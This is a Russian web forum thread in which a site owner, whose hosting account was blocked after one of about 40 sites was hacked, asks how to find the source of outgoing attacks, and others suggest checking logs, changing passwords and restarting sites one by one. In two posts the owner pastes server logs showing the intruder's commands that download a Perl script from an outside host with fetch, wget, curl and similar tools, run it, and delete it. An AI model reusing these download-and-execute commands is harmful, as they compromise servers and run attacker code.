Хостер может не определить с какого сайта идут "атаки" на др. сервера?

basterr
На сайте с 24.11.2005
Offline
719
4048

Собсно сабж. Ситуация - на акке около 40 сайтов, один сломали, я собсно даже знаю какой. Меня уверяют, что определить не могут с какого именно сайта идут атаки и в связи с этим заблочили весь акк - такое вообще возможно, что определить по логам нельзя откуда именно атака?

O
На сайте с 06.10.2006
Offline
71
#1
basterr:
такое вообще возможно, что определить по логам нельзя откуда именно атака?

Вообще атака атаке рознь, но логи на то и логи, чтобы по ним определять.

Странно.., а что в трактовке хостера вообще значит «не может определить»? Если но логам не может, то пусть определяет тогда по чему-нибудь другому )) Вы же, надо думать, деньги платите им...

basterr
На сайте с 24.11.2005
Offline
719
#2

да вон дали какое-то:

srv8005 66341 1.8 0.0 5136 1500 ?? SJ 12:58PM 0:00.05 /bin/sh -c cd
/tmp;fetch http://notonyourradio.com/21.txt>21.txt;perl 21.txt;rm -rf 21.txt
srv8005 66344 0.4 0.0 5136 1500 ?? SJ 12:58PM 0:00.05 /bin/sh -c cd
/tmp;fetch http://notonyourradio.com/21.txt>21.txt;perl 21.txt;rm -rf 21.txt
srv8005 66345 0.0 0.0 7256 1860 ?? SJ 12:58PM 0:00.01 fetch
http://notonyourradio.com/21.txt
srv8005 66346 0.0 0.0 7256 1860 ?? SJ 12:58PM 0:00.01 fetch
http://notonyourradio.com/21.txt

по адресам ходить не советую.

Мы не знаем, с какого именно сайта идут атаки. Для нас, они идут с Вашего
аккаунта, и это делаете либо Вы, либо через Ваши сайты.
Boris A Dolgov
На сайте с 04.07.2007
Offline
215
#3

Тут действительно, атака идет не с сайта а с аккаунта. А разбираться, какой сайт ломанули - дело Ваше.

С уважением, Борис Долгов. Администрирование, дешевые лицензии ISPsystem, Parallels, cPanel, DirectAdmin, скины, SSL - ISPlicense.ru (http://www.isplicense.ru/?from=4926)
O
На сайте с 06.10.2006
Offline
71
#4
Boris A Dolgov:
А разбираться, какой сайт ломанули - дело Ваше.

Т.е. в такой трактовке в хостеру нельзя что ли обратиться с вопросом: «Вы можете помочь установить, какой сайт сломали?» Мне, почему-то, очень сильно кажется, что можно обратиться. ))

basterr
На сайте с 24.11.2005
Offline
719
#5

посоветуйте чтоли что тогда делать-то вообще? я знаю какой ломанули. но что там именно сломали и как я докажу что именно оттуда атака идет? я в этих долбанных логах вообще ничего не понимаю.

ну или может кто помочь может? ессно за деньги.

kod_ssilki_ru
На сайте с 02.03.2005
Offline
176
#6

Как мне представляется, зависит от конфигурации хостера, - для большинства случаев, я склонен согласиться с Борисом (т.е. говорить о взломе аккаунта); откуда/как взломали - не знаю

вот если бы речь шла об аккаунте, организованным с достаточно "полноценными" сайтами типа 1gb или Зенона (по терминологии последнего "дополнительный web-сервер"), тогда, полагаю, взломанный сайт был бы, в определенном смысле, сам по себе - но при такой организации аккаунта обычно держать на нем 40 действительно независимых сайтов дорого обходится, так что врядли речь идет о подобном варианте

Аккаунт закрыт 21.07.2009 ЛС (PM) отключены. Всем успехов! И Спасибо тем, кто был добр ко мне. Этот аккаунт ломали 18.05.2010 в 11.13 с ip 118.97.72.37 189.42.222.213 202.146.241.19 82.198.27.9
kxk
На сайте с 30.01.2005
Offline
970
kxk
#7

basterr, Ваш хостер вам дал ssh ?

Ваш DEVOPS
basterr
На сайте с 24.11.2005
Offline
719
#8

ну я хз как там у хт-сустемса организовано.

kxk, ssh должен быть.

kxk
На сайте с 30.01.2005
Offline
970
kxk
#9

kod_ssilki_ru, Судя по логам (они странноватые) чудеса творят на уровне ssh с логином тс. Тут надо просить логи доступа с Ипшниками, правдо на 99,99% будет какойнибудь прокси из страны которая игнорирует любые абузы ((( Во первых я бы сменил все пароли + попросил бы хостера временно выключить все сайты и убить все запущенные от имени тс процессы, потом запускать по одному и смотреть ху есть кто.

kxk добавил 23.07.2008 в 15:42

basterr, Попросите ssh для вас отключить ибо вы я так понимаю в нём "не взуб ногой" если слабо разбираетесь в логах, остальное я отписал выше.

basterr
На сайте с 24.11.2005
Offline
719
#10

хех. сайты как раз и вырубили. пароли только что поменял.

kxk:
потом запускать по одному и смотреть ху есть кто

как я смотреть-то буду, если я вообще во всем этом "не в зуб ногой"?

вообще до этого мне давали такие логи:

WD=/storage/home/srv8005/htdocs/sevchem ; USER=srv8005 ; COMMAND=/bin/sh -c cd
/tmp;wget http://notonyourradio.com/21.txt;perl 21.txt;rm -rf 21.txt
Jul 20 23:38:16 c10 sudo: www : TTY=unknown ;
PWD=/storage/home/srv8005/htdocs/sevchem ; USER=srv8005 ; COMMAND=/bin/sh -c cd
/tmp;curl -O http://notonyourradio.com/21.txt;perl 21.txt;rm -rf 21.txt
Jul 20 23:38:16 c10 sudo: www : TTY=unknown ;
PWD=/storage/home/srv8005/htdocs/sevchem ; USER=srv8005 ; COMMAND=/bin/sh -c cd
/tmp;lwp-download http://notonyourradio.com/21.txt;perl 21.txt;rm -rf 21.txt
Jul 20 23:38:16 c10 sudo: www : TTY=unknown ;
PWD=/storage/home/srv8005/htdocs/sevchem ; USER=srv8005 ; COMMAND=/bin/sh -c cd
/tmp;lynx -source http://notonyourradio.com/21.txt;perl 21.txt;rm -rf 21.txt

по ссылкам тоже ходить не советую. и вырубали один сайт. я думал поправил, отписал им. нифига оказывается не поправил и сегодня выключили все.

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий